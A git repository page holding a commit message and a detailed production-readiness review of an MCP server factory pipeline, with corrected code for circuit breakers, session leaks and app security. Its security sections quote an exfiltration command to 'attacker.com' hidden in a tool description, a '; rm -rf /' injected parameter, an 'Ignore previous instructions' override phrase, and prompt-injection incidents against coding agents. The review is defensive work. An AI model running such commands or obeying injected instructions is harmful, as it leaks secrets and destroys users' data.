Jake Shore f3c4cd817b Add all MCP servers + factory infra to MCPEngine — 2026-02-06

=== NEW SERVERS ADDED (7) ===
- servers/closebot — 119 tools, 14 modules, 4,656 lines TS (Stage 7)
- servers/google-console — Google Search Console MCP (Stage 7)
- servers/meta-ads — Meta/Facebook Ads MCP (Stage 8)
- servers/twilio — Twilio communications MCP (Stage 8)
- servers/competitor-research — Competitive intel MCP (Stage 6)
- servers/n8n-apps — n8n workflow MCP apps (Stage 6)
- servers/reonomy — Commercial real estate MCP (Stage 1)

=== FACTORY INFRASTRUCTURE ADDED ===
- infra/factory-tools — mcp-jest, mcp-validator, mcp-add, MCP Inspector
  - 60 test configs, 702 auto-generated test cases
  - All 30 servers score 100/100 protocol compliance
- infra/command-center — Pipeline state, operator playbook, dashboard config
- infra/factory-reviews — Automated eval reports

=== DOCS ADDED ===
- docs/MCP-FACTORY.md — Factory overview
- docs/reports/ — 5 pipeline evaluation reports
- docs/research/ — Browser MCP research

=== RULES ESTABLISHED ===
- CONTRIBUTING.md — All MCP work MUST go in this repo
- README.md — Full inventory of 37 servers + infra docs
- .gitignore — Updated for Python venvs

TOTAL: 37 MCP servers + full factory pipeline in one repo.
This is now the single source of truth for all MCP work.

2026-02-06 06:32:29 -05:00

36 KiB

Raw Blame History

Boss Mei — Final Review & Improvement Proposals

Reviewer: Director Mei — Enterprise Production & Scale Systems Authority
Date: 2026-02-04
Scope: Full MCP Factory pipeline (6 skills) — production readiness assessment
Verdict: NOT READY FOR PRODUCTION AT A BANK — but with targeted fixes, could be within 2-3 weeks

Pass 1 Notes (Per Skill — Production Readiness Assessment)

1. MCP-FACTORY.md (Pipeline Orchestrator)

What's good:

Clear 6-phase pipeline with defined inputs/outputs per phase
Quality gates at every stage — this is production-grade thinking
Agent parallelization (Phases 2 & 3 concurrent) is correct
Inventory tracking (30 untested servers) shows awareness of tech debt

What concerns me:

No rollback strategy at the pipeline level. If Phase 4 fails, there's no automated way to undo Phases 2-3 artifacts. Each server build is fire-and-forget.
No versioning scheme for servers. When you have 30+ servers, you need to know which version of the analysis doc produced which server build. There's no traceability.
No dependency management between servers. What happens when two servers share the same API (e.g., GHL CRM tools used across multiple channels)? No guidance on deduplication.
Estimated times are optimistic. "30-60 minutes" for a large API analysis — in practice, complex OAuth APIs (Salesforce, HubSpot) take 3-4 hours with their quirky auth flows.
Missing: capacity planning. 30+ servers all running as stdio processes means 30+ Node.js processes. On a Mac Mini with 8/16GB RAM, that's a problem.

Production readiness: 7/10 — solid architecture, needs operational depth.

2. mcp-api-analyzer (Phase 1)

What's good:

API style detection (REST/GraphQL/SOAP/gRPC/WebSocket) is comprehensive
Pagination pattern catalog is excellent — covers all 8 common patterns
Tool description formula (6-part with "When NOT to use") is research-backed
Elicitation candidates section shows protocol-awareness
Content annotations planning (audience + priority) is forward-thinking
Token budget awareness with specific targets (<5,000 tokens per server)

What concerns me:

No rate limit testing strategy. The analyzer documents rate limits but doesn't recommend actually testing them before production. A sandbox environment should be mandatory.
OAuth2 device code flow not covered. Many IoT and headless APIs use device_code grant — relevant for MCP servers running headlessly.
Version deprecation section is thin. "Check for sunset timelines" is not enough. Need a specific cadence for re-checking API versions (quarterly minimum).
Missing: webhook/event-driven patterns. The doc says "note but don't deep-dive" on webhooks. For production, many tools NEED webhook support for real-time data (e.g., CRM deal updates, payment notifications).
Missing: API sandbox/test environment detection. The analyzer should flag whether the API has a sandbox, because this directly affects how QA can be done.

Production readiness: 8/10 — strongest skill, minor gaps.

3. mcp-server-builder (Phase 2)

What's good:

Circuit breaker pattern is implemented correctly
Request timeouts via AbortController — essential, many builders miss this
Structured logging on stderr (JSON format with request IDs) — production-grade
Pluggable pagination strategies — well-architected
Dual transport (stdio + Streamable HTTP) with env var selection
Health check tool always included — excellent operational practice
Error classification (protocol vs tool execution) follows spec correctly
Token budget targets are realistic (<200 tokens/tool, <5,000 total)

What concerns me (CRITICAL):

Circuit breaker has a race condition. The half-open state allows ONE request through, but if multiple tool calls arrive simultaneously (common in multi-turn conversations), they ALL pass through before the circuit records success/failure. This can overwhelm a recovering API.
No jitter on retry delays. RETRY_BASE_DELAY * Math.pow(2, attempt) creates thundering herd — all retrying clients hit the API at exactly the same time. Must add random jitter.
Memory leak risk in HTTP transport session management. sessions Map grows unboundedly. Dead sessions (client disconnected) are only removed on explicit DELETE. In production, network interruptions mean many sessions will never be cleaned up. This WILL cause OOM over time.
Rate limit tracking is per-client-instance, not per-API-key. If you have multiple MCP server instances behind a load balancer sharing the same API key, each instance tracks its own rate limit counters independently. They'll collectively exceed the limit.
The paginate() method's any type casts. Multiple as any casts in the pagination code — if the API response shape changes, these silently pass and produce runtime errors downstream.
No request deduplication. If the LLM calls the same tool twice simultaneously (happens with parallel tool calling), two identical API requests fire. For GET it's wasteful, for POST it can create duplicates.
OAuth2 token refresh has no mutex. In the client_credentials pattern, if the token expires and 5 requests arrive simultaneously, all 5 will attempt to refresh the token. Need a lock/semaphore.
AbortController timeout in the finally block is correct, but the timeout callback still fires after the controller is garbage-collected in some Node.js versions. Should explicitly call controller.abort() in the clearTimeout path for safety.

Production readiness: 6/10 — good foundation, but the concurrency bugs and memory leak are production-killers.

4. mcp-app-designer (Phase 3)

What's good:

Design system is comprehensive (color palette, typography, spacing tokens)
WCAG AA compliance is explicitly called out with contrast ratios
9 app type templates covering common patterns
Three-state rendering (loading/empty/data) is mandatory
Error boundary with window.onerror — essential for iframe stability
Bidirectional communication (sendToHost) enables app→host interaction
Accessibility: sr-only, focus management, prefers-reduced-motion
Interactive Data Grid with sort, filter, expand, bulk select — feature-rich

What concerns me:

XSS in escapeHtml() function uses DOM-based escaping. document.createElement('div').textContent = text is safe in browsers, but if anyone ever renders this server-side (SSR), it won't work. Also, this approach creates a DOM element per escape call — at scale (1000 rows), that's 6000+ DOM element creations.
Polling fallback has no circuit breaker. If /api/app-data is down, the app retries 20 times with increasing delays. That's up to 20 failed requests per app per session. With 30+ apps, that's 600 failed requests hammering a broken endpoint.
postMessage has NO origin validation. The template accepts messages from ANY origin (*). In production, this means any page that can embed the iframe (or any browser extension) can inject arbitrary data into the app. This is a known security vulnerability pattern.
setInterval(pollForData, 3000) in the old reference — though the newer template uses exponential backoff, verify all existing apps use the new pattern. Fixed-interval polling at 3s is a DoS vector.
Interactive Data Grid's handleSearch has double-sort bug. When search + sort are both active, handleSort is called twice, toggling the direction back. The comment says "toggle it back" but this is a UX bug.
Missing: Content Security Policy. No CSP meta tag in the template. Single-file HTML apps with inline scripts need script-src 'unsafe-inline', but should at least restrict form actions, frame ancestors, and connect-src.
Missing: iframe sandboxing guidance. The apps run in iframes but there's no guidance on the sandbox attribute the host should apply.

Production readiness: 7/10 — solid design system, security gaps need immediate attention.

5. mcp-localbosses-integrator (Phase 4)

What's good:

Complete file-by-file checklist (5 files to update)
System prompt engineering guidelines are excellent (structured, budgeted, with few-shot examples)
APP_DATA failure mode catalog with parser pattern — very production-aware
Thread state management with localStorage limits documented
Rollback strategies (git, feature-flag, manifest-based) — good operational thinking
Integration validation script that cross-references all 4 files — catches orphaned entries
Intake question quality criteria with good/bad examples
Token budget targets for prompts (<500 channel, <300 addon)

What concerns me:

APP_DATA parsing is fragile by design. The entire data flow depends on the LLM generating valid JSON inside a comment block. Research shows LLMs produce malformed JSON 5-15% of the time. The fallback parser helps, but this is an architectural fragility — you're trusting probabilistic output for deterministic rendering.
No schema validation on APP_DATA before sending to app. The parser extracts JSON, but nothing validates it matches what the app expects. A valid JSON object with wrong field names silently produces broken apps.
Thread cleanup relies on client-side code. The cleanupOldThreads function is recommended but not enforced. Without it, localStorage grows indefinitely. At 5MB, you hit QuotaExceededError and threads start silently failing.
System prompt injection risk. The system prompt includes user-facing instructions like "TOOL SELECTION RULES." If an attacker puts "Ignore previous instructions" in a chat message, the LLM might comply because the system prompt wasn't hardened against injection. Need system prompt hardening techniques.
No rate limiting on thread creation. A user (or bot) can create unlimited threads, each consuming localStorage and server-side context. No guard against abuse.
Validation script uses regex to parse TypeScript. This is inherently fragile — template strings, multi-line expressions, and comments can all cause false positives/negatives. AST-based parsing (ts-morph or TypeScript compiler API) would be more reliable.
Missing: canary deployment guidance. The feature-flag strategy is described but there's no guidance on gradually rolling out a channel to a subset of users before full deployment.

Production readiness: 7/10 — operationally aware, but the APP_DATA architectural fragility is a long-term concern.

6. mcp-qa-tester (Phase 5)

What's good:

6-layer testing architecture with quantitative metrics — extremely thorough
MCP protocol compliance testing (Layer 0) using MCP Inspector + custom JSON-RPC client
structuredContent schema validation against outputSchema
Playwright visual testing + BackstopJS regression
axe-core accessibility automation with score thresholds
Performance benchmarks (cold start, latency, memory, file size)
Chaos testing (API 500s, wrong formats, huge datasets, rapid-fire messages)
Security testing (XSS payloads, postMessage origin, key exposure)
Comprehensive test data fixtures library (edge cases, adversarial, unicode, scale)
Automated QA shell script with persistent reporting
Regression baselines and trending

What concerns me:

Layer 4 (live API testing) is the weakest link. The credential management strategy is documented but manual. With 30+ servers, manually managing .env files is error-prone. Need a secrets manager (Vault, AWS Secrets Manager, or at minimum encrypted at rest).
No test isolation. Jest tests with MSW are good, but there's no guidance on ensuring tests don't interfere with each other. If one test modifies MSW handlers and doesn't clean up, subsequent tests get unexpected behavior.
MCP protocol test client is too simple. The MCPTestClient reads lines, but MCP over stdio sends JSON-RPC messages that may span multiple lines (when using content with newlines). Need proper message framing.
No load/stress testing. Performance testing covers cold start and single-request latency, but not concurrent load. What happens when 10 users hit the same MCP server simultaneously over HTTP? No guidance.
Tool routing tests are framework-only, not actual LLM tests. The routing fixtures validate that the expected tools exist, but don't actually test that the LLM selects the right tool. This is the MOST IMPORTANT test for production, yet it requires the LLM in the loop — there's no harness for that.
Missing: smoke test for deployment. After deploying to production, need a post-deployment smoke test that validates the server is reachable, tools respond, and at least one app renders. The QA script assumes a development environment.
BackstopJS baseline management at scale. With 30+ servers × 5+ apps × 3 viewports = 450+ screenshots. That's a lot of baselines to maintain. Need guidance on selective regression (only re-test changed servers).

Production readiness: 8/10 — most comprehensive testing framework I've seen for MCP, but needs LLM-in-the-loop testing and load testing.

Pass 2 Notes (Operational Gaps, Race Conditions, Security Issues)

Can a team operate 30+ servers built with these skills?

Short answer: Not without additional operational infrastructure.

Gaps:

No centralized health dashboard. Each server has a health_check tool, but nothing aggregates health across all 30+ servers. An operator can't answer "which servers are healthy right now?" without calling each one individually.
No alerting integration. The structured logging is good, but there's no guidance on connecting it to PagerDuty, Slack alerts, or any alerting system. In production, you need to know when circuit breakers trip within minutes, not hours.
No centralized log aggregation. Each server logs to stderr. With 30+ servers, that's 30+ separate log streams. Need guidance on piping to a centralized system (stdout → journald → Loki/Datadog/CloudWatch).
No deployment automation. Building a server is documented, deploying it is not. There's no Dockerfile, docker-compose, systemd service file, or PM2 ecosystem file. Each server is assumed to run manually.
No dependency update strategy. 30+ servers × package.json = 30+ sets of npm dependencies. When MCP SDK ships a breaking change, who updates all 30? Need a monorepo or automated dependency update workflow.

Incident Response

What happens when an API goes down at 3 AM?

The circuit breaker opens (good), the health_check shows "unhealthy" (good), but:

Nobody is alerted
No runbook exists for "API is down"
No guidance on whether to restart the server, wait, or disable the channel
No SLA expectations documented per API

What happens when a tool returns wrong data?

The LLM generates APP_DATA based on wrong data
The app renders it — user sees incorrect information
No data validation layer between tool output and LLM consumption
No "data looks suspicious" detection

Race Conditions Identified

Circuit breaker half-open concurrent requests (described in Pass 1) — CRITICAL
OAuth token refresh thundering herd — CRITICAL
localStorage thread cleanup vs active write — if cleanup runs while a thread is being created, the new thread may be deleted immediately
Rapid postMessage updates — the template handles this via deduplication (JSON.stringify comparison), but this comparison is O(n) on data size and blocks the UI thread for large datasets

Memory Leak Risks

HTTP session Map — unbounded growth, no TTL, no max size — CRITICAL
Polling timers in apps — if clearTimeout(pollTimer) fails (e.g., render throws before clearing), orphaned timers accumulate
AbortController in retry loops — each retry creates a new AbortController. If a request hangs past the timeout but doesn't complete, the old controller stays in memory
Logger request IDs — no concern, short-lived strings
Tool registry lazy loading — tools load once, handlers reference client — no leak here

Security Posture Assessment

Adequate for internal tools? Yes, mostly.
Adequate for production at a bank? NO.

Critical gaps:

No input sanitization between LLM output and tool parameters. The LLM generates tool arguments, Zod validates the schema, but doesn't sanitize for injection. A prompt-injected LLM could pass ; rm -rf / as a parameter if the tool eventually shells out.
No postMessage origin validation in app template — any page can inject data
No CSP in app template — inline scripts are unconstrained
API keys stored in plain .env files — no encryption at rest
No audit logging — tool calls are logged but not in a tamper-proof audit trail
No rate limiting on tool calls — a compromised LLM could invoke destructive tools in a tight loop

Research Findings (Production Patterns and Incidents)

Real-World MCP Security Incidents (2025-2026)

Supabase MCP "Lethal Trifecta" Attack (mid-2025): Cursor agent running with privileged service-role access processed support tickets containing hidden SQL injection. Attacker exfiltrated integration tokens through a public thread. Root cause: privileged access + untrusted input + external communication channel.
Asana MCP Data Exposure (June 2025): Customer data leaked between MCP instances due to a bug. Asana published a post-mortem. Lesson: multi-tenant MCP deployments need strict data isolation.
492 Exposed MCP Servers (2025): Trend Micro found 492 MCP servers publicly exposed with no authentication. Many had command-execution flaws. Lesson: MCP servers MUST NOT be internet-accessible without authentication.
mcp-remote Command Injection: Vulnerability in the mcp-remote package allowed command injection. Lesson: MCP ecosystem supply chain is immature — audit dependencies.
Tool Description Injection (ongoing): Researchers demonstrated that malicious tool descriptions can inject hidden prompts. The weather_lookup example: hiding curl -X POST attacker.com/exfil -d $(env) in a tool description. Lesson: tool descriptions are an attack vector.

Production Architecture Patterns (2025-2026)

MCP Gateway Pattern (Microsoft, IBM, Envoy): A reverse proxy that fronts multiple MCP servers behind one endpoint. Adds session-aware routing, centralized auth, policy enforcement, observability. Microsoft's mcp-gateway is Kubernetes-native. IBM's ContextForge federates MCP + REST + A2A. Envoy AI Gateway provides MCP proxy with multiplexed streams.
Container-Per-Server (ToolHive, Docker): Each MCP server runs in its own container. ToolHive by Stacklok provides container lifecycle management with zero-config observability. Docker's blog recommends using Docker as the MCP server gateway. Key insight: containers provide process isolation + resource limits that stdio doesn't.
Sidecar Observability (ToolHive): Rather than modifying each MCP server, a sidecar proxy intercepts MCP traffic and emits OpenTelemetry spans. Zero server modification. This is the recommended approach for retrofitting observability onto existing servers.

Observability Best Practices

From Zeo's analysis of 16,400+ MCP server implementations:

73% of production outages start at the transport/protocol layer — yet it's the most overlooked
Agents fail 20-30% of the time without recovery — human oversight is essential
Method-not-found errors (-32601) above 0.5% indicate tool hallucination — a critical reliability signal
JSON-RPC parse errors (-32700) spikes correlate with buggy clients or scanning attempts
Three-layer monitoring model: Transport → Tool Execution → Task Completion

Proposed Improvements (Specific, Actionable, With Corrected Code)

CRITICAL: Fix Circuit Breaker Race Condition

Problem: Half-open state allows unlimited concurrent requests.
Fix: Add a mutex/semaphore so only ONE request passes through in half-open state.

class CircuitBreaker {
  private state: CircuitState = "closed";
  private failureCount = 0;
  private lastFailureTime = 0;
  private halfOpenLock = false; // ADD THIS
  private readonly failureThreshold: number;
  private readonly resetTimeoutMs: number;

  constructor(failureThreshold = 5, resetTimeoutMs = 60_000) {
    this.failureThreshold = failureThreshold;
    this.resetTimeoutMs = resetTimeoutMs;
  }

  canExecute(): boolean {
    if (this.state === "closed") return true;
    if (this.state === "open") {
      if (Date.now() - this.lastFailureTime >= this.resetTimeoutMs) {
        // Only allow ONE request through in half-open
        if (!this.halfOpenLock) {
          this.halfOpenLock = true;
          this.state = "half-open";
          logger.info("circuit_breaker.half_open");
          return true;
        }
        return false; // Another request already testing
      }
      return false;
    }
    // half-open: already locked, reject additional requests
    return false;
  }

  recordSuccess(): void {
    this.halfOpenLock = false;
    if (this.state !== "closed") {
      logger.info("circuit_breaker.closed", { previousFailures: this.failureCount });
    }
    this.failureCount = 0;
    this.state = "closed";
  }

  recordFailure(): void {
    this.halfOpenLock = false;
    this.failureCount++;
    this.lastFailureTime = Date.now();
    if (this.failureCount >= this.failureThreshold || this.state === "half-open") {
      this.state = "open";
      logger.warn("circuit_breaker.open", {
        failureCount: this.failureCount,
        resetAfterMs: this.resetTimeoutMs,
      });
    }
  }
}

CRITICAL: Add Jitter to Retry Delays

Problem: Exponential backoff without jitter causes thundering herd.
Fix:

// BEFORE (bad):
await this.delay(RETRY_BASE_DELAY * Math.pow(2, attempt));

// AFTER (correct):
const baseDelay = RETRY_BASE_DELAY * Math.pow(2, attempt);
const jitter = Math.random() * baseDelay * 0.5; // 0-50% jitter
await this.delay(baseDelay + jitter);

CRITICAL: Fix HTTP Session Memory Leak

Problem: Sessions Map grows without bound.
Fix: Add TTL-based cleanup and max session limit.

// In startHttpTransport():
const sessions = new Map<string, { transport: StreamableHTTPServerTransport; lastActivity: number }>();
const MAX_SESSIONS = 100;
const SESSION_TTL_MS = 30 * 60 * 1000; // 30 minutes

// Session cleanup interval
const cleanupInterval = setInterval(() => {
  const now = Date.now();
  for (const [id, session] of sessions.entries()) {
    if (now - session.lastActivity > SESSION_TTL_MS) {
      logger.info("session.expired", { sessionId: id });
      sessions.delete(id);
    }
  }
}, 60_000); // Check every minute

// Limit max sessions
function getOrCreateSession(sessionId?: string): StreamableHTTPServerTransport {
  if (sessionId && sessions.has(sessionId)) {
    const session = sessions.get(sessionId)!;
    session.lastActivity = Date.now();
    return session.transport;
  }
  if (sessions.size >= MAX_SESSIONS) {
    // Evict oldest session
    let oldest: string | null = null;
    let oldestTime = Infinity;
    for (const [id, s] of sessions.entries()) {
      if (s.lastActivity < oldestTime) {
        oldestTime = s.lastActivity;
        oldest = id;
      }
    }
    if (oldest) sessions.delete(oldest);
  }
  // Create new session...
}

// Clean up on server shutdown
process.on('SIGTERM', () => {
  clearInterval(cleanupInterval);
  sessions.clear();
});

CRITICAL: Add OAuth Token Refresh Mutex

Problem: Concurrent requests all try to refresh expired token simultaneously.
Fix:

export class APIClient {
  private accessToken: string | null = null;
  private tokenExpiry: number = 0;
  private refreshPromise: Promise<string> | null = null; // ADD THIS

  private async getAccessToken(): Promise<string> {
    // Return cached token if valid (5 min buffer)
    if (this.accessToken && Date.now() < this.tokenExpiry - 300_000) {
      return this.accessToken;
    }

    // If already refreshing, wait for that to complete
    if (this.refreshPromise) {
      return this.refreshPromise;
    }

    // Start a new refresh and let all concurrent callers share it
    this.refreshPromise = this._doRefresh();
    try {
      const token = await this.refreshPromise;
      return token;
    } finally {
      this.refreshPromise = null;
    }
  }

  private async _doRefresh(): Promise<string> {
    // ... actual token refresh logic ...
  }
}

HIGH: Add postMessage Origin Validation to App Template

// In the message event listener:
window.addEventListener('message', (event) => {
  // Validate origin — only accept from our host
  const allowedOrigins = [
    window.location.origin,
    'http://localhost:3000',
    'http://192.168.0.25:3000',
    // Add production origin
  ];
  
  // In production, be strict. In development, accept any.
  const isDev = window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1';
  if (!isDev && !allowedOrigins.includes(event.origin)) {
    console.warn('[App] Rejected postMessage from untrusted origin:', event.origin);
    return;
  }

  try {
    const msg = event.data;
    // ... existing handler logic ...
  } catch (e) {
    console.error('postMessage handler error:', e);
  }
});

HIGH: Add CSP Meta Tag to App Template

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- Content Security Policy -->
  <meta http-equiv="Content-Security-Policy" 
    content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:; connect-src 'self'; frame-ancestors 'self';">
  <title>{App Name}</title>

HIGH: Replace DOM-Based escapeHtml with String-Based

// BEFORE (creates DOM elements — slow at scale):
function escapeHtml(text) {
  if (!text) return '';
  const div = document.createElement('div');
  div.textContent = String(text);
  return div.innerHTML;
}

// AFTER (string replacement — 10x faster, SSR-safe):
function escapeHtml(text) {
  if (!text) return '';
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

HIGH: Add Centralized Health Dashboard Tool

Add to MCP-FACTORY.md — a meta-server that aggregates health:

// health-aggregator.ts — runs as a separate process
// Calls health_check on every registered MCP server
// Exposes a dashboard endpoint

interface ServerHealth {
  name: string;
  status: 'healthy' | 'degraded' | 'unhealthy' | 'unreachable';
  lastChecked: string;
  latencyMs: number;
  error?: string;
}

async function checkAllServers(): Promise<ServerHealth[]> {
  const servers = loadServerRegistry(); // Read from config
  return Promise.all(servers.map(async (server) => {
    try {
      const result = await callMCPTool(server.command, 'health_check', {});
      return { name: server.name, ...JSON.parse(result), lastChecked: new Date().toISOString() };
    } catch (e) {
      return { name: server.name, status: 'unreachable', lastChecked: new Date().toISOString(), latencyMs: -1, error: String(e) };
    }
  }));
}

MEDIUM: Add Dockerfile Template to Server Builder

# {service}-mcp/Dockerfile
FROM node:22-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --production=false
COPY . .
RUN npm run build

FROM node:22-alpine
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY --from=builder /app/package.json ./

# Non-root user
RUN addgroup -g 1001 mcp && adduser -u 1001 -G mcp -s /bin/sh -D mcp
USER mcp

# Health check
HEALTHCHECK --interval=30s --timeout=10s --start-period=5s \
  CMD node -e "fetch('http://localhost:3000/health').then(r => process.exit(r.ok ? 0 : 1)).catch(() => process.exit(1))"

# Default to HTTP transport in containers
ENV MCP_TRANSPORT=http
ENV MCP_HTTP_PORT=3000
EXPOSE 3000

CMD ["node", "dist/index.js"]

MEDIUM: Add Interactive Data Grid Search Double-Sort Fix

// BEFORE (buggy — double toggles sort direction):
function handleSearch(query) {
  gridState.searchQuery = query.toLowerCase().trim();
  // ... filtering logic ...
  if (gridState.sortCol) {
    handleSort(gridState.sortCol);
    gridState.sortDir = gridState.sortDir === 'asc' ? 'desc' : 'asc';
    handleSort(gridState.sortCol);
  } else {
    renderRows();
  }
}

// AFTER (correct — apply sort without toggling):
function handleSearch(query) {
  gridState.searchQuery = query.toLowerCase().trim();
  if (!gridState.searchQuery) {
    gridState.filteredItems = [...gridState.items];
  } else {
    gridState.filteredItems = gridState.items.filter(item =>
      Object.values(item).some(v =>
        v != null && String(v).toLowerCase().includes(gridState.searchQuery)
      )
    );
  }
  // Re-apply current sort WITHOUT toggling direction
  if (gridState.sortCol) {
    applySortToFiltered(); // New function that sorts without toggling
  }
  renderRows();
}

function applySortToFiltered() {
  const colKey = gridState.sortCol;
  if (!colKey) return;
  gridState.filteredItems.sort((a, b) => {
    let aVal = a[colKey], bVal = b[colKey];
    if (aVal == null) return 1;
    if (bVal == null) return -1;
    if (typeof aVal === 'number' && typeof bVal === 'number') {
      return gridState.sortDir === 'asc' ? aVal - bVal : bVal - aVal;
    }
    aVal = String(aVal).toLowerCase();
    bVal = String(bVal).toLowerCase();
    const cmp = aVal.localeCompare(bVal);
    return gridState.sortDir === 'asc' ? cmp : -cmp;
  });
}

MEDIUM: Add LLM-in-the-Loop Tool Routing Test Harness

Add to QA tester skill:

// tests/llm-routing.test.ts
// This test REQUIRES an LLM endpoint (Claude API or local proxy)

const LLM_ENDPOINT = process.env.LLM_TEST_ENDPOINT || 'http://localhost:3001/v1/chat/completions';

interface RoutingTestCase {
  message: string;
  expectedTool: string;
  systemPrompt: string; // from channel config
}

async function testToolRouting(testCase: RoutingTestCase): Promise<{
  correct: boolean;
  selectedTool: string | null;
  latencyMs: number;
}> {
  const start = performance.now();
  
  const response = await fetch(LLM_ENDPOINT, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      model: 'claude-sonnet-4-20250514',
      messages: [
        { role: 'system', content: testCase.systemPrompt },
        { role: 'user', content: testCase.message },
      ],
      tools: loadToolDefinitions(), // From compiled server
      tool_choice: 'auto',
    }),
  });
  
  const data = await response.json();
  const latencyMs = Math.round(performance.now() - start);
  const toolCall = data.choices?.[0]?.message?.tool_calls?.[0];
  const selectedTool = toolCall?.function?.name || null;
  
  return {
    correct: selectedTool === testCase.expectedTool,
    selectedTool,
    latencyMs,
  };
}

LOW: Add Monorepo Structure for Multi-Server Management

For managing 30+ servers, recommend a workspace structure:

mcp-servers/
├── package.json          # Workspace root
├── turbo.json            # Turborepo config for parallel builds
├── shared/
│   ├── client/           # Shared API client base class
│   ├── logger/           # Shared logger
│   └── types/            # Shared TypeScript types
├── servers/
│   ├── calendly-mcp/
│   ├── mailchimp-mcp/
│   ├── zendesk-mcp/
│   └── ... (30+ servers)
└── scripts/
    ├── build-all.sh
    ├── health-check-all.sh
    └── update-deps.sh

Operational Readiness Checklist (Must Exist Before Deploying to Production)

Infrastructure (P0 — blocking)

Containerization: Every server has a Dockerfile and can be built/deployed as a container
Process management: PM2, systemd, or Kubernetes manifests for all servers (not manual node dist/index.js)
Health monitoring: Centralized health dashboard that polls all servers every 60s
Alerting: Circuit breaker trips → Slack/PagerDuty alert within 5 minutes
Log aggregation: All server stderr → centralized logging (Loki, Datadog, or similar)
Secrets management: API keys NOT in plaintext .env files — use encrypted store or secrets manager
Resource limits: Memory + CPU limits per server process (containers or cgroups)

Code Quality (P0 — blocking)

Circuit breaker race condition fixed (half-open mutex)
Retry jitter added (prevent thundering herd)
HTTP session TTL + max limit (prevent memory leak)
OAuth token refresh mutex (prevent concurrent refresh)
postMessage origin validation in all app templates
CSP meta tag in all app templates
String-based escapeHtml (not DOM-based)

Testing (P0 — blocking)

MCP Inspector passes for every server
TypeScript compiles clean for every server
axe-core score >90% for every app
XSS test passes for every app
At least 20 tool routing fixtures per server

Testing (P1 — should have)

LLM-in-the-loop routing tests for critical channels
Playwright visual regression baselines captured
Load test: 10 concurrent users per HTTP server without degradation
Chaos test: API-down scenario completes gracefully
Smoke test script for post-deployment validation

Operations (P1 — should have)

Runbook: "API is down" — steps for each integrated API
Runbook: "Server OOM" — diagnosis and restart procedure
Runbook: "Wrong data rendered" — debugging data flow
Dependency update cadence: Monthly npm audit + quarterly SDK updates
API version monitoring: Quarterly check for deprecation notices
Backup: LocalBosses localStorage thread data export capability

Security (P0 for production, P1 for internal)

No API keys in client-side code (HTML apps, browser-accessible JS)
Tool descriptions reviewed for injection — no hidden instructions
Audit logging for destructive operations (delete, update)
Rate limiting on tool calls (max N calls per minute per user)
Input sanitization on tool parameters that touch external systems

Final Assessment

What's Excellent

The MCP Factory pipeline is architecturally sound. The 6-phase approach with quality gates, the comprehensive testing framework, and the attention to MCP spec compliance (2025-11-25) are all above-average for the industry. The API analyzer skill is particularly strong — the pagination catalog, tool description formula, and token budget awareness show deep expertise.

What Would Break Under Load

HTTP session memory leak (will OOM in days under moderate traffic)
Circuit breaker allowing all requests through in half-open (can DDoS a recovering API)
No retry jitter (thundering herd when API recovers)
No process management (30 servers = 30 unmonitored Node processes)

What's Missing for Enterprise

MCP Gateway/proxy layer (Microsoft, IBM, Envoy all provide this — needed for centralized auth, routing, observability)
Container orchestration (Docker + K8s manifests)
Centralized secrets management
Audit trail for tool invocations
Rate limiting at the MCP layer (not just API layer)
LLM-in-the-loop testing (the most important test, yet the hardest)

Recommendation

Fix the 4 critical code issues (circuit breaker, jitter, session leak, token mutex). Add Dockerfiles. Set up PM2 or equivalent. Then you can ship to production for internal use. For bank-grade production, add the MCP Gateway layer and secrets management.

Signed: Director Mei — "If the circuit breaker has a race condition, don't deploy it. Period."

36 KiB Raw Blame History Unescape Escape

Boss Mei — Final Review & Improvement Proposals

Pass 1 Notes (Per Skill — Production Readiness Assessment)

1. MCP-FACTORY.md (Pipeline Orchestrator)

2. mcp-api-analyzer (Phase 1)

3. mcp-server-builder (Phase 2)

4. mcp-app-designer (Phase 3)

5. mcp-localbosses-integrator (Phase 4)

6. mcp-qa-tester (Phase 5)

Pass 2 Notes (Operational Gaps, Race Conditions, Security Issues)

Can a team operate 30+ servers built with these skills?

Incident Response

Race Conditions Identified

Memory Leak Risks

Security Posture Assessment

Research Findings (Production Patterns and Incidents)

Real-World MCP Security Incidents (2025-2026)

Production Architecture Patterns (2025-2026)

Observability Best Practices

Proposed Improvements (Specific, Actionable, With Corrected Code)

CRITICAL: Fix Circuit Breaker Race Condition

CRITICAL: Add Jitter to Retry Delays

CRITICAL: Fix HTTP Session Memory Leak

CRITICAL: Add OAuth Token Refresh Mutex

HIGH: Add postMessage Origin Validation to App Template

HIGH: Add CSP Meta Tag to App Template

HIGH: Replace DOM-Based escapeHtml with String-Based

HIGH: Add Centralized Health Dashboard Tool

MEDIUM: Add Dockerfile Template to Server Builder

MEDIUM: Add Interactive Data Grid Search Double-Sort Fix

MEDIUM: Add LLM-in-the-Loop Tool Routing Test Harness

LOW: Add Monorepo Structure for Multi-Server Management

Operational Readiness Checklist (Must Exist Before Deploying to Production)

Infrastructure (P0 — blocking)

Code Quality (P0 — blocking)

Testing (P0 — blocking)

Testing (P1 — should have)

Operations (P1 — should have)

Security (P0 for production, P1 for internal)

Final Assessment

What's Excellent

What Would Break Under Load

What's Missing for Enterprise

Recommendation

36 KiB

Raw Blame History